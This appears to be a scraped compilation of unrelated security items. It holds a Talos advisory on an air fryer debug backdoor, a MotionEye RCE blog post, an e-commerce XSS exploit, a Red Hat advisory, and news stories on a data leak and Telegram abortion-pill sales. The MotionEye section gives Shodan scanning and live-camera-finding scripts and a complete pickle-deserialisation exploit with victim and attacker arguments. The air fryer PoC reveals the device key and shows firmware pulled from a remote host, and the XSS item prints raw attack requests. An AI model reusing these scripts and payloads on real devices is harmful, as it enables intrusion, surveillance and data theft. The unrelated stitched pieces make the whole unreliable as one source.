A unauthenticated backdoor exists in the configuration server functionality of Cosori Smart 5.8-Quart Air Fryer CS158-AF 1.1.0. A specially crafted JSON object can lead to code execution. An attacker can send a malicious packet to trigger this vulnerability.

**Summary**

A unauthenticated backdoor exists in the configuration server functionality of Cosori Smart 5.8-Quart Air Fryer CS158-AF 1.1.0. A specially crafted JSON object can lead to code execution. An attacker can send a malicious packet to trigger this vulnerability.

**Tested Versions**

Cosori Smart 5.8-Quart Air Fryer CS158-AF 1.1.0

**Product URLs**

https://www.cosori.com/shop/cosori-smart-58-quart-air-fryer-cs158-af

**CVSSv3 Score**

8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-912 - Hidden Functionality

**Details**

The Cosori Smart Air Fryer is a WiFi-enabled kitchen appliance that allows user to activate the device remotely, look up recipe guides and monitor cooking status via the mobile application.

During the initial setup phase, the embedded ESP-01E-based device functions as a WiFi access point that must be associated with before the mobile application can register the device with the appropriate cloud servers. During this registration process, information about the device is queried via mobile app such as nearby access points and the firmware version.

This communication occurs over TCP port 41234 and all traffic is encrypted JSON with a static, symmetric key and IV that is embedded with the firmware:

.user\_data\_seg\_3:3FFE911E 6C 6C 77 61+aLlwantaesivv10 .ascii “llwantaesivv1.01llwantaeskey1.01”

    Where
    KEY = "llwantaeskey1.01"
    IV = "llwantaesivv1.01"
    

During setup, the mobile application sends a configuration packet similar to this, with an interesting option “tcpDebugPort:

        "serverDN":     "vdmpmqtt.vesync.com:1883",                                          
        "configKey":    <config_key>,                                                  
        "serverIP":     <server_ip>
        "tcpDebugPort": "off", <<<--- Here
        "wifiSSID":     "MY_SSID",                                                             
        "wifiPassword": "my_Cool_Wifi_passw0rd",                                                  
        "uri":  "/beginConfigRequest",                                                       
        "pid":  <pid>
    

**Exploit Proof of Concept**

If an attacker encrypts and sends a modified version of this packet to the device during setup, we can enable “Developer Mode”:

        "serverDN":     "vdmpmqtt.vesync.com:1883",                                          
        "configKey":    <config_key>,                                                  
        "serverIP":     <server_ip>
        "tcpDebugPort": "on", <<<--- Here
        "wifiSSID":     "MY_SSID",                                                             
        "wifiPassword": "my_Cool_Wifi_passw0rd",                                                  
        "uri":  "/beginConfigRequest",                                                       
        "pid":  <snip>
    

This allows an attacker to subsequently connect to a listening port on the now registered device unauthenticated and unencrypted over tcp port 55555:

    $ netcat 192.168.1.241 55555
    Developer login !
    

This connection will repeat all serial log data over the connection, allowing an attacker to monitor the device and its current activities remotely: \[D\]

    "jsonCmd":	{
    	"getStatus":	"status"
    },
    "cid":	"<snip>",
    "pid":	"shadowMockPid",
    "deviceRegion":	"shadowDeviceRegion",
    "traceId":	"<snip>",
    "method":	"bypass",
    "module":	"cloud-shadowService"
    
    [D]traceId : <snip> 
    [D]cid:<snip>
    [D]method : bypass 
    [D]<Vesync>Mqtt send : 
    {"traceId":"<snip>","method":"bypass","pid":"<snip>","cid":"<snip>","result":{"returnStatus":{"cookStatus":"pullOut"}}}
    [I]set_control
    

This communication channel will remain open until the user either removes the device via application or manually performs a factory reset. A device that is already registered can still be targeted but would require an attacker to manually factory reset the device and re-register it with the same credentials but with tcpDebugPort enabled. The mobile application will be unaware of this and continue to function as normal but with the backdoor enabled.

There are even some debugging commands that an attacker may use such as a triggering manual firmware update pointing to a client-specified remote location. This could allow remote code execution if the checksums are passed.

    Client request: 
    {"traceId":"","method":"bypass","type":"","cid":"","pid":"","jsonCmd":{"firmware":        
    {"newVersion":"1.1.00","url":"http://myfwhost.com/v1.1.00/","ts":1605635148}}}
    
    [D]<Vesync>
    {
    "firmware":	{
    	"newVersion":	"1.1.00",
    	"url":	"http://myfwhost.com/v1.1.00/",
    	"ts":	0
    
    
    Server response:
    [I]set_control
    [I]<Vesync>Upgrade firmware now !
    [D]<Vesync>host is:myfwhost.com
    [D]<Vesync>port is: 80 
    [D]<Vesync>path is:/v1.1.00/
    [D]<Vesync>url_is_host_need_dns is:myfwhost.com
    [I]<Vesync>upgrade dns
    [I]<Vesync>upgrade dns cb:myfwhost.com
    [I]<Vesync>upgrade dns found 10.6.9.1
    system_upgrade_start
    upgrade_connect 27816
    upgrade_connect_cb
    pusrdata = HTTP/1.0 200 OK
    
    server do not support HEAD method now send GET message
    pusrdata = Server: SimpleHTTP/0.6 Python/2.7.17
    Date: Tue, 08 Dec 2020 19:57:32 GMT
    Content-type: application/octet-stream
    Content-Length: 394740
    Last-Modified: Tue, 08 Dec 2020 19:41:03 GMT
    
    <snip>
    upgrade_check
    upgrade file download finished.
    flash_crc = 1166539277 
    img_crc = 1166539277
    upgrade_check
    [I]<Vesync>fw upgrade success
    

**Timeline**

2020-12-21 - Initial Contact  
2021-01-05 - 1st follow up; auto-reply received from Cosori support

2021-02-17 - 2nd follow up  
2021-03-29 - Final 90 day follow up  
2021-04-15 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2020-28593: TALOS-2020-1217 || Cisco Talos Intelligence Group

By Habiba Rashid
The leaked database contained a staggering 96,175 folders that housed 255,756 records, totaling a size of 93.93 GB.
This is a post from HackRead.com Read the original post: US Auto Insurance Price Comparison Site RateForce Leaks Massive PII Data

**RateForce is a platform that facilitates online comparison of car insurance quotes and has boasted nearly 11 million quotes since 2014.**

A massive data breach has come to light, exposing over 250,000 documents containing the personal and sensitive information of thousands of individuals from the United States.

The breach, which lasted for at least two weeks, involved an unsecured database containing scans and images of various documents, including vehicle registrations, driver’s licenses, insurance cards, vehicle titles, and state Medicaid health coverage cards.

The breach was initially discovered by security researcher Jeremiah Fowler, who stumbled upon the exposed database. Upon further investigation, it was revealed that the primary insurer associated with all the policies listed in the database was USA Underwriters.

Concerned about the severity of the data exposure, the researcher promptly reached out to USA Underwriters via email with a responsible disclosure notice. However, despite multiple attempts, the researcher received no response.

Taking matters into his own hands, Fowler managed to contact someone at USA Underwriters by phone and emphasized the urgency of the situation. Following the call, the database was finally secured and restricted from public access within two hours.

The story took an unexpected twist when Fowler received a voicemail from an individual claiming to be a detective from the Detroit Police, seeking to ask a few questions.

“I searched the name and phone number of the alleged detective and a LinkedIn account matched the same unique and uncommon name of a USA Underwriters employee. I returned the call and asked if the individual was an employee or affiliated with USA Underwriters and each time the answer was, “No”,” Fowler detailed in the report to vpnMentor.

Furthermore, the detective in question mentioned that a third-party vendor named RateForce was the owner of the compromised database. This incident is somewhat similar to the one in November 2020, in which Vertafore, an Insurance Software Solution exposed license details of 27.7M Texas drivers.

RateForce is a platform that facilitates online comparison of car insurance quotes and has boasted nearly 11 million quotes since 2014. In 2021, the company ranked second on the prestigious Inc. 5000 list of the fastest-growing private companies in the insurance industry. This revelation suggests that the breach may have affected a significant number of individuals who have utilized RateForce’s services.

The compromised records revealed a substantial presence of independent insurance agents who sold policies. It appears that most of the documents originated from agencies and car dealerships procuring insurance on behalf of their customers. While the majority of identification documents belonged to individuals from Michigan, licenses from Georgia, Arizona, and Virginia were also observed.

The database contained a staggering 96,175 folders that housed 255,756 records, totaling a size of 93.93 GB. These folders contained insurance policy cards, driver’s licenses (front and back), and, in some cases, additional documents such as auto loan information, state registrations, Medicaid or health insurance cards, utility bills, and letters from banks showing active accounts.

Type of leaked data

Moreover, the breach exposed customer and applicant names, home addresses, phone numbers, driver’s license numbers, vehicle identification numbers (VINs), and insurance policy details. Shockingly, sales records with auto dealer information, including EIN tax identification numbers, were also compromised, with some records even containing buyers’ social security numbers in plain text.

While USA Underwriters was initially thought to be the owner of the exposed database, it was later confirmed that the database belonged to RateForce, indicating the involvement of a third-party vendor.

USA Underwriters clarified that they employ a separate IT company to manage their infrastructure and disclaimed any responsibility for the management of the breached database. This incident serves as a reminder of the risks associated with third-party vendors and highlights the need for stringent security measures and oversight when handling sensitive customer information.

1.  Latitude Financial Data Breach: 14 M Users Affected
2.  General Motors collected locations of 90,000 drivers
3.  FedEx users’​ ​passports, ID & driving licenses exposed
4.  Data Breach at MCNA Dental Insurer Impacts 9M Users
5.  Pakistani ride-hailing app BYKEA exposed 400m records

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

US Auto Insurance Price Comparison Site RateForce Leaks Massive PII Data

Authenticated remote code execution in MotionEye <= 0.42.1 and MotioneEyeOS <= 20200606 allows a remote attacker to upload a configuration backup file containing a malicious python pickle file which will execute arbitrary code on the server.

**Getting Started with MotionEye**

MotionEye is an open source, web-based GUI for the popular Motion CLI application found on Linux. I’ve known of the Motion command line app for years, but I didn’t know that MotionEye existed. I ran across it while trying to find a multiple webcam, GUI or web based solution for future projects.

MotionEye comes in a couple forms – a standalone app, which I used the docker container version of, or a “whole” operating system, MotionEyeOS, to install on a Raspberry Pi.

Starting off, I used Shodan search to find internet facing installations. Here is the script I used for that. If you use this script, you’ll need to put in your API key and the limit parameter, which limits the API queries that you use.

    #!/usr/bin/env python3
    
    import sys
    # pip3 install shodan
    from shodan import Shodan
    import requests
    
    # check for api key
    api = Shodan('') # Insert API key here
    
    if api.api_key == '':
        print("No API key found! Exiting")
        sys.exit(1)
    
    limit = 1000 # set this to limit your api query usage
    counter = 0
    
    url_file = open("urls.txt", "w")
    
    for response in api.search_cursor('Server: motionEye'):
        ip = response['ip_str']
        port = response['port']
        url = f'http://{ip}:{port}'
        url_file.write(url + '\n')
    
        # Keep track of how many results have been downloaded so we don't use up all our query credits
        counter += 1
        if counter >= limit:
            break
    
    url_file.close()

I ran out of query credits when I ran this script. There are thousands of installations out there. This script will output the IP addresses of those installations.

**Finding Live Feeds**

In my review of the application, I found that you can make a query to the _/picture/{camera-number}/current/_ endpoint, and if it returns a 200 status code, it means that the feed is open to the public. You can also increment the camera-number an enumerate the numbers of cameras a feed will actually have, even if it isn’t available to view.

I took the output of motioneye-shodan.py script above, and fed it to live-feeds.py script below.

    #!/usr/bin/env python3
    
    import requests
    
    url_file = open("urls.txt", "r")
    urls = url_file.readlines()
    url_file.close()
    
    live_urls = open("live-urls.txt", "w")
    
    for url in urls:
        try:
            response = requests.get(url + "/picture/0/current/", verify=False, timeout=3).status_code
            print(response)
            if response == 200:
                live_urls.write(url)
        except:
            pass
    
    live_urls.close()

This script outputs the URL of camera feeds that we can view. But the real question here is, what security issues are there with MotionEye?

**Information Leakage**

It turns out that if you make a get request to the following endpoint _/config/list_, some of the feeds will return their config files. Most of the time these config files are innocuous. I’m not sure why these are publicly accessible even if the feed is publicly accessible. Maybe it is used as an API endpoint of some sort. I need to dig into the code some more.

However, sometimes these config files contain some very sensitive information. Consider the following config with _email\_notifications\_smtp\_password_ and _email\_notifications\_addresses_ removed. These passwords are supposed to be for services that the public cannot access, but unfortunately people like to reuse passwords. Again, why is this file even readable?

![](https://www.pizzapower.me/blog/wp-content/uploads/2021/10/Screenshot-from-2021-10-09-07-41-22.png)

**Rate-Limiting and Default Credentials**

So, the default installation of MotionEye uses the username of admin and a blank password. Additionally, MotionEye does not seem to institute any sort of rate limiting on login attempts. This is a recipe for disaster.

**Authenticated RCE Method #1**

Once logged in, I found two simple methods of code execution. The first of which is a classic Python cPickle deserialization exploit.

In the configuration section of the application, there is an option to backup and restore the application configurations. It turns out that if you include a malicious tasks.pickle file in the config you are restoring with, it’ll be written to disk and will be loaded when the application is restarted automatically or manually.

You can simply download the current configuration to use it as a template. After downloading and extracting it, slide your malicious tasks.pickle file and tar.gz everything back up.

The final structure of my motioneye-config.tar.gz for the docker container is as follows:

├── camera-1.conf  
├── motion.conf  
├── motioneye.conf  
└── tasks.pickle

Alternatively, the final structure of my motioneye-config.tar.gz lon MotionEyeOS is the following:

├── adjtime  
├── camera-1.conf  
├── crontabs  
├── date.conf  
├── localtime -> /usr/share/zoneinfo/UTC  
├── motion.conf  
├── motioneye.conf  
├── ntp.conf  
├── os.conf  
├── proftpd.conf  
├── shadow  
├── shadow-  
├── smb.conf  
├── ssh  
│   ├── ssh\_host\_dsa\_key  
│   ├── ssh\_host\_dsa\_key.pub  
│   ├── ssh\_host\_ecdsa\_key  
│   ├── ssh\_host\_ecdsa\_key.pub  
│   ├── ssh\_host\_ed25519\_key  
│   ├── ssh\_host\_ed25519\_key.pub  
│   ├── ssh\_host\_rsa\_key  
│   └── ssh\_host\_rsa\_key.pub  
├── static\_ip.conf  
├── tasks.pickle  
├── version  
├── watch.conf  
└── wpa\_supplicant.conf

Pause here: You see, those are ssh keys. So you say why don’t we just try ssh? Go for it. You also may not even need a password, but some people have either secured ssh or disabled ssh on the actually raspberry pi, so it won’t work. A lot of these instances will have ssh turned off, and if it is running in docker, you probably won’t be able to download the ssh keys. Also, it is more fun to write scripts in Python.

Once the configuration is uploaded, wait for the app to reload, or, in unfortunate cases, wait for the app to be reloaded by mother nature or the victim. From what I can see, the docker application will not autoreboot. Here is a Python 3 script that will do all of this. Also, see the github repo, which may be more updated.

    #!/usr/bin/env python3
    
    import requests
    import argparse
    import os
    import pickle
    import hashlib
    import tarfile
    import time
    import string
    import random
    from requests_toolbelt import MultipartEncoder
    import json
    
    
    # proxies = {"http": "http://127.0.0.1:9090", "https": "http://127.0.0.1:9090"}
    proxies = {}
    
    
    def get_cli_args():
        parser = argparse.ArgumentParser(description="MotionEye Authenticated RCE Exploit")
        parser.add_argument(
            "--victim",
            help="Victim url in format ip:port, or just ip if port 80",
            required=True,
        )
        parser.add_argument("--attacker", help="ipaddress:port of attacker", required=True)
        parser.add_argument(
            "--username", help="username of web interface, default=admin", default="admin"
        )
        parser.add_argument(
            "--password", help="password of web interface, default=blank", default=""
        )
        args = parser.parse_args()
        return args
    
    
    def login(username, password, victim_url):
        session = requests.Session()
        useragent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
        headers = {"User-Agent": useragent}
        login_url = f"http://{victim_url}/login/"
        body = f"username={username}&password={password}"
        session.post(login_url, headers=headers, data=body)
        return session
    
    
    def download_config(username, victim_url, session):
        download_url = f"http://{victim_url}/config/backup/?_username={username}&_signature=5907c8158417212fbef26936d3e5d8a04178b46f"
        backup_file = session.get(download_url)
        open("motioneye-config.tar.gz", "wb").write(backup_file.content)
        return
    
    
    def create_pickle(ip_address, port):
        shellcode = ""  # put your shellcode here
    
        class EvilPickle(object):
            def __reduce__(self):
                cmd = shellcode
                return os.system, (cmd,)
    
        # need protocol=2 and fix_imports=True for python2 compatibility
        pickle_data = pickle.dumps(EvilPickle(), protocol=2, fix_imports=True)
        with open("tasks.pickle", "wb") as file:
            file.write(pickle_data)
            file.close()
        return
    
    
    def decompress_add_file_recompress():
        with tarfile.open("./motioneye-config.tar.gz") as original_backup:
            original_backup.extractall("./motioneye-config")
            original_backup.close()
        original_backup.close()
        os.remove("./motioneye-config.tar.gz")
        # move malicious tasks.pickle into the extracted directory and then tar and gz it back up
        os.rename("./tasks.pickle", "./motioneye-config/tasks.pickle")
        with tarfile.open("./motioneye-config.tar.gz", "w:gz") as config_tar:
            config_tar.add("./motioneye-config/", arcname=".")
        config_tar.close()
        return
    
    
    def restore_config(username, password, victim_url, session):
        # a lot of this is not necessary, but makes for good tradecraft
        # recreated 'normal' requests as closely as I could
        t = int(time.time() * 1000)
        path = f"/config/restore/?_={t}&_username={username}"
        # admin_hash is the sha1 hash of the admin's password, which is '' in the default case
        admin_hash = hashlib.sha1(password.encode("utf-8")).hexdigest().lower()
        signature = (
            hashlib.sha1(f"POST:{path}::{admin_hash}".encode("utf-8")).hexdigest().lower()
        )
        restore_url = f"http://{victim_url}/config/restore/?_={t}&_username=admin&_signature={signature}"
    
        # motioneye checks for "---" as a form boundary. Python Requests only prepends "--"
        # so we have to manually create this
        files = {
            "files": (
                "motioneye-config.tar.gz",
                open("motioneye-config.tar.gz", "rb"),
                "application/gzip",
            )
        }
    
        useragent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
        boundary = "----WebKitFormBoundary" + "".join(
            random.sample(string.ascii_letters + string.digits, 16)
        )
    
        m = MultipartEncoder(fields=files, boundary=boundary)
        headers = {
            "Content-Type": m.content_type,
            "User-Agent": useragent,
            "X-Requested-With": "XMLHttpRequest",
            "Cookie": "meye_username=_; monitor_info_1=; motion_detected_1=false; capture_fps_1=5.6",
            "Origin": f"http://{victim_url}",
            "Referer": f"http://{victim_url}",
            "Accept-Language": "en-US,en;q=0.9",
        }
        response = session.post(restore_url, data=m, headers=headers, proxies=proxies)
        # if response == reboot false then we need reboot routine
        content = json.loads(response.content.decode("utf-8"))
    
        if content["reboot"] == True:
            print("Rebooting! Stand by for shell!")
        else:
            print("Manual reboot needed!")
        return
    
    
    if __name__ == "__main__":
        print("Running exploit!")
        arguments = get_cli_args()
        session = login(arguments.username, arguments.password, arguments.victim)
        download_config(arguments.username, arguments.victim, session)
        # sends attacker ip and port as arguments to create the pickle
        create_pickle(arguments.attacker.split(":")[0], arguments.attacker.split(":")[1])
        decompress_add_file_recompress()
        restore_config(arguments.username, arguments.password, arguments.victim, session)
    

**Authenticated RCE Method #2**

Another method of code execution involves motion detection. There is an option to run a system command whenever motion is detected. The security implications of this are obvious.

![](https://www.pizzapower.me/blog/wp-content/uploads/2021/10/rce-motioneye-1024x591.jpg)

python rev shell

**Conclusion**

While authentication is needed for RCE, the presence of default credentials and lack of rate limiting make obtaining authentication straightforward. There are a lot of people running this software in a vulnerable manner.

As per my usual advice, don’t expose MotionEye to the WWW. Like all the self-hosted solutions, I advise you to install this to face your internal network and then connect to your internal network via OpenVPN or Wireguard.

Update: As for MotionEye, I really like the app. I’m currently using it in production – with a robust password, haha.

CVE-2021-44255: Hacking MotionEye/MotionEyeOS | Pizza-Powered Hacking 🍕

The gray market for abortifacient sales to the US is evolving alongside a shifting legal landscape.

If you search for the phrase “abortion pills” on the messaging service Telegram, an array of public channels and groups pop up. Some have names like “Buy Abortion Pills” or “Abortion pills Mifepristone Misoprostol” while others offer advice on symptoms and best practices “after the pregnancy comes out.” On May 3, a post on “ABORTION PILLS MARKET” included a photo of a blister pack labeled as abortion pills, alongside the caption, “We are legit.”

There are currently more than 200 public groups and channels on Telegram that explicitly mention selling abortion pills in their name or description, a WIRED investigation found. At the end of May, the last month for which we have complete data, 57 of the 211 groups we uncovered were active, with at least one message sent in that month.

Activity found on the platform related to selling abortion pills traces back to at least 2016, and many of the channels and groups cater to customers around the world. In the year since the US Supreme Court overturned _Roe v. Wade_ in June 2022, though, there’s a new focus on marketing to people in the United States, according to WIRED’s review of roughly 47,000 public messages scraped from these channels. And in general, public activity on Telegram related to abortion pills has been exploding since last summer.

Telegram did not immediately return WIRED's request for comment about the sale of abortifacients or other drugs on the platform.

Shady drug sellers and scams are nothing new on digital platforms. A nearly universal experience of the early consumer internet, after all, was receiving spam emails claiming to offer penis enlargement pills. And in the decades since, dark web markets have fueled illegal distribution of drugs globally. Like other prescription drugs, though, abortifacients are legal in some countries but not others. Furthermore, in some places they can be prescribed for certain purposes but not others, leaving patients to potentially seek ways to fill in the gaps for their own care. In the US, access to reproductive care, including abortifacients, varies widely from state to state.

Despite the clear uptick in activity on Telegram related to abortion pills, researchers say that they don’t see evidence of a massive new movement to illegally sell abortifacients to Americans. Kat Green, an abortion access researcher and founder of the online data analysis platform Endora, says that illegal sales of abortifacients, and corresponding questions about legitimacy and safety, aren’t currently central topics in US abortion access work. In part, this is likely because it’s still legal in many US states for patients to get abortion pills by mail. And prescribed use of these pills, also known as medication abortion, is markedly on the rise in the US. But as new and pending legal challenges threaten to further curtail access, illicit sales could eventually expand.

Analysis of frequently used phrases in the Telegram message trove WIRED collected shows that a large number of these groups and channels don’t just claim to sell abortion pills. Phrases like “weight loss,” “muscle mass,” and “erection pill” were among the 10 most popular two-word phrases that appeared in the data set. And thousands of additional messages mentioned “benzos,” “painkillers,” “Xanax,” “weed,” “coke,” and “guns.” In all, at least a quarter of the channels appear to be hawking more than just abortifacients.

Hundreds of messages from the data that contained pricing information indicate that the average cost of purchasing a purported pack of abortion pills on Telegram is currently $135.

WIRED’s investigation also indicates that the abortion pill ecosystem on Telegram is likely a small world. Analysis of the members and administrators who send messages in the groups and channels shows that many of the accounts are likely controlled by the same individuals. For example, a user going by the name Dr. Pooja Gupta has sent 1,500 messages across nine channels or groups advertising the sale of abortion pills. Dr. Pooja uses a WhatsApp number that is referenced by administrators in 14 additional channels. And some of them use similar names like Doctor Jain and Doctor Reenu. Many of these messages also referenced the same website.

After joining several of Dr. Pooja Gupta’s channels, WIRED reporters received a private Telegram message from a user known as Manisha Gupta offering medication abortion for $90. When WIRED reporters expressed interest in making a purchase, a person prepared the order and sent an image showing a blister pack of pills, and an envelope with that day's date as well as the address WIRED provided for shipment. The return address written on the envelope was a location in Mumbai, India.

Still messaging on Telegram, a person then sent account information for Punjab National Bank and directed WIRED to submit payment through a service called Remitly. WIRED reporters did not complete the transaction. When asked whether they have had more US-based customers in recent months, the person said, “since new laws I am send to America much more.”

Some groups on Telegram have US-specific names or descriptions, like “Abortion Pills in Republican States,” but most have more generic names and claim to deliver to dozens of countries. For instance, one of the largest and most active channels in the data set dates from August 2021 and is apparently specifically geared toward delivering abortion pills to Dubai, Kuwait, Qatar, and the Philippines—all countries where legal access to abortion is restricted.

Last June, researchers from the security firm DarkOwl noticed a sharp increase in discussions on the dark web about connecting abortion-seekers in the US with abortifacients and other resources. Some vendors that already sold illegal drugs said they would begin selling medication abortion as well. At the time, though, the researchers said that they didn’t actually see abortion pills widely available for sale on most dark web markets, but that “they are available for purchase via threads in discussion forums, as well as classified-style advertisements on transient paste services.”

Ian Gray, director of analysis and research at the security firm Flashpoint, says that turning points like the Covid-19 pandemic or the fall of _Roe_ for the US can spark trends in digital scams and illicit online sales. But a survey Gray conducted for WIRED of dark web advertising targeted at the US over the last year did not reveal a dramatic spike in content related to abortifacients.

“At a high level, it's difficult to identify a significant increase in chatter related to abortion pills due to _Roe v Wade_ being overturned last year,” Gray says. He notes, though, that “there are a limited number of posts within the past year in marketplaces, which may indicate demand. Most posts, at least on Twitter and some within Telegram, are in Brazilian Portuguese, likely due to a ban on abortion pills.”

As with many medical procedures, the stakes are extremely high in medication abortion. But the patchwork of laws and access in the US could make the landscape particularly fraught for patients in need who may eventually turn to illicit markets out of desperation.

Inside the Illicit Market for Abortion Pills on Telegram

Ecommerce version 1.0 suffers from cross site scripting and open redirection vulnerabilities.

    ## Title: Ecommerse-1.0 XSS-Reflected Hijack-credentials - JavaScript Injection## Author: nu11secur1ty## Date: 11.23.2022## Vendor: https://github.com/winston-dsouza## Software: https://github.com/winston-dsouza/ecommerce-website## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website## Description:The value of the eMail request parameter is copied into the value ofan HTML tag attribute which is encapsulated in double quotation marks.The attacker can trick the users of this system, very easy to visit avery dangerous link from anywhere, and then the game will over forthese customers.Also, the attacker can create a network from botnet computers by usingthis vulnerability.## STATUS: HIGH Vulnerability[+] Exploit00:```POSTPOST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://pornhub.comHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2fOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/ecommerce/index.phpContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Description01:JavaScript can be injected into the application response (a vulnerableapp - signup_script.php, no sanitizing submit function).The attacker can crash the MySQL server by sending large bites of POSTrequests to the MySQL server of this system.## STATUS: HIGH Vulnerability - CRITICAL## Real attack:[+] Exploit01:```POSTPOST /ecommerce/signup_script.php HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2fOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/ecommerce/index.phpContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 1070eMail=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&password=s9L%21c7x%21E2&firstName=WoZykRqh&lastName=cqeMPJcJ```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)## Proof and Exploit:[href](https://streamable.com/3r4t36)## Real Exploit:[href](https://streamable.com/n3b5ev)## Real Exploit - code insert:[href](https://streamable.com/64dmo2)## Time spent`1:45`

Ecommerce 1.0 Cross Site Scripting / Open Redirect

Red Hat Security Advisory 2022-5531-01 - Red Hat Advanced Cluster Management for Kubernetes 2.5.1 General Availability release images, which fix security issues and bugs.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat Advanced Cluster Management 2.5.1 security updates and bug fixes  
Advisory ID:       RHSA-2022:5531-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5531  
Issue date:        2022-07-07  
CVE Names:         CVE-2020-28915 CVE-2021-3695 CVE-2021-3696   
                   CVE-2021-3697 CVE-2021-40528 CVE-2022-1271   
                   CVE-2022-1621 CVE-2022-1629 CVE-2022-22576   
                   CVE-2022-24450 CVE-2022-25313 CVE-2022-25314   
                   CVE-2022-27666 CVE-2022-27774 CVE-2022-27776   
                   CVE-2022-27782 CVE-2022-28733 CVE-2022-28734   
                   CVE-2022-28735 CVE-2022-28736 CVE-2022-28737   
                   CVE-2022-29824   
=====================================================================

1. Summary:

Red Hat Advanced Cluster Management for Kubernetes 2.5.1 General  
Availability release images, which fix security issues and bugs.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

2. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.5.1 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following  
Release Notes documentation, which will be updated shortly for this  
release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html/release_notes/

Security update:

* nats-server: misusing the "dynamically provisioned sandbox accounts"  
feature authenticated user can obtain the privileges of the System account  
(CVE-2022-24450)

Bug fixes:

* Can't install submariner add-ons from UI on unsupported cloud provider  
(BZ# 2087686)

* policy controller addons are Progressing status (unhealthy from backend)  
on OCP3.11 in ARM hub (BZ# 2088270)

* RHACM 2.5.1 images (BZ# 2090802)

* Broken link to Submariner manual install instructions (BZ# 2095333)

* `The backend service is unavailable` when accessing ACM 2.5 Overview page  
(BZ# 2096389)

* 64 character length causing clusters to unsubscribe (BZ# 2101453)

3. Solution:

For Red Hat Advanced Cluster Management for Kubernetes, see the following  
documentation, which will be updated shortly for this release, for  
important  
instructions on installing this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/install/index#installing

